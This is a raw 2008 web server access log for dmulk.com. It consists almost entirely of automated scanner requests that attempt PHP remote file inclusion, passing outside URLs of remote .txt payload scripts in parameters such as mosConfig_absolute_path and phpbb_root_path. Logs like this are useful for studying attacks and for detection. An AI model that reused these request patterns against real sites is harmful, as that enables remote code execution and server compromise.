67.19.104.82 - - [12/Aug/2008:10:50:06 -0700] "GET /errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:10:50:12 -0700] "GET /errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:10:50:12 -0700] "GET /logs/access.log/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:10:50:12 -0700] "GET /logs/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:50:14 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:50:15 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:50:15 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:50:19 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:50:20 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:50:20 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:50:22 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:50:22 -0700] "GET /phphtml.php?htmlclass_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:50:27 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:50:27 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:50:31 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:50:34 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:50:36 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:50:38 -0700] "GET /logs/errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:50:38 -0700] "GET /errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:50:39 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:50:41 -0700] "GET /logs/access_080229.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:50:46 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:50:47 -0700] "GET /logs/errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:50:48 -0700] "GET /errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:50:49 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:50:51 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:50:51 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:50:56 -0700] "GET /logs/access_080229.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:50:57 -0700] "GET /logs/access_080302.log//admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:50:57 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:50:58 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:51:03 -0700] "GET /logs/access_080125.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:51:05 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:51:12 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:51:15 -0700] "GET /logs/access_080229.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:10:51:16 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:10:51:17 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:51:24 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:51:24 -0700] "GET /logs/access.log/errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:51:24 -0700] "GET /errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:51:25 -0700] "GET /logs/errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:51:27 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.49.254.139 - - [12/Aug/2008:10:51:28 -0700] "GET /logs/access_080114.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.49.254.139 - - [12/Aug/2008:10:51:30 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 18483 "-" "libwww-perl/5.79" "www.dmulk.com"
64.49.254.139 - - [12/Aug/2008:10:51:30 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 60283 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:51:34 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:51:34 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:51:37 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18557 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:51:37 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18541 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:51:38 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:51:38 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:51:43 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.232.156.130 - - [12/Aug/2008:10:51:44 -0700] "GET /logs/access_080315.log//error.php?error=http://www.community.nigeria.com//forums/Packages/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [12/Aug/2008:10:51:44 -0700] "GET //error.php?error=http://www.community.nigeria.com//forums/Packages/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [12/Aug/2008:10:51:45 -0700] "GET /logs//error.php?error=http://www.community.nigeria.com//forums/Packages/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [12/Aug/2008:10:51:45 -0700] "GET /logs/access.log//error.php?error=http://www.community.nigeria.com//forums/Packages/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:51:45 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:51:47 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.17.183 - - [12/Aug/2008:10:51:49 -0700] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:51:51 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:52:27 -0700] "GET /xGB.php?act=admin&do=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:10:52:28 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:52:33 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:52:33 -0700] "GET /logs/access_080315.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:52:34 -0700] "GET /logs/access_080315.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:10:52:43 -0700] "GET /logs/access.log/errors.php?error=http://www.wingsart.ru/gstbook/templates/liscence.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:10:52:43 -0700] "GET /errors.php?error=http://www.wingsart.ru/gstbook/templates/liscence.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:10:52:43 -0700] "GET /logs/errors.php?error=http://www.wingsart.ru/gstbook/templates/liscence.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.12.151.24 - - [12/Aug/2008:10:52:49 -0700] "GET /logs/access_080324.log/errors.php?error=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:52:51 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 500 374 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
67.19.90.90 - - [12/Aug/2008:10:52:52 -0700] "GET /logs/config.php?path_to_root=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:10:52:53 -0700] "GET /config.php?path_to_root=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:52:58 -0700] "GET /logs/access_080303.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:52:58 -0700] "GET /logs/access_080303.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:53:32 -0700] "GET /logs/access_080224.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:53:32 -0700] "GET /logs/access_080224.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:53:41 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:53:43 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:53:48 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:53:50 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:53:52 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:53:53 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.111.137 - - [12/Aug/2008:10:54:02 -0700] "GET /logs/access_080309.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://guerlissy.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.111.137 - - [12/Aug/2008:10:54:02 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://guerlissy.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.111.137 - - [12/Aug/2008:10:54:02 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://guerlissy.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.232.156.130 - - [12/Aug/2008:10:54:04 -0700] "GET //error.php?error=http://www.community.nigeria.com//forums/Packages/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.111.137 - - [12/Aug/2008:10:54:05 -0700] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://guerlissy.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.85.130.159 - - [12/Aug/2008:10:54:10 -0700] "GET /logs//index.php?pagina=http://www.luoghidellacultura.it/www//components/com_joomla-visites/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
195.85.130.159 - - [12/Aug/2008:10:54:12 -0700] "GET //index.php?pagina=http://www.luoghidellacultura.it/www//components/com_joomla-visites/cmd.txt?? HTTP/1.1" 200 18495 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:54:16 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:10:54:21 -0700] "GET /logs/access_080324.log/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:54:42 -0700] "GET /logs/access_080221.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:54:42 -0700] "GET /logs/access_080221.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:54:42 -0700] "GET /logs/access_080120.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:54:42 -0700] "GET /logs/access_080120.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:54:52 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
69.42.218.66 - - [12/Aug/2008:10:54:55 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/metaljaya/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
69.42.218.66 - - [12/Aug/2008:10:54:55 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/metaljaya/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:10:55:19 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:10:55:19 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:10:55:19 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:55:29 -0700] "GET /logs/access.log/errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:55:29 -0700] "GET /errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:55:30 -0700] "GET /logs/errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:55:32 -0700] "GET /logs/xGB.php?act=admin&do=http://primeraconchali.cl/modules/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:55:35 -0700] "GET /xGB.php?act=admin&do=http://primeraconchali.cl/modules/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:55:40 -0700] "GET /logs/access_080302.log//admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:55:42 -0700] "GET /logs/access_080125.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:55:45 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:55:47 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:55:52 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:56:05 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:56:06 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:56:06 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:56:06 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
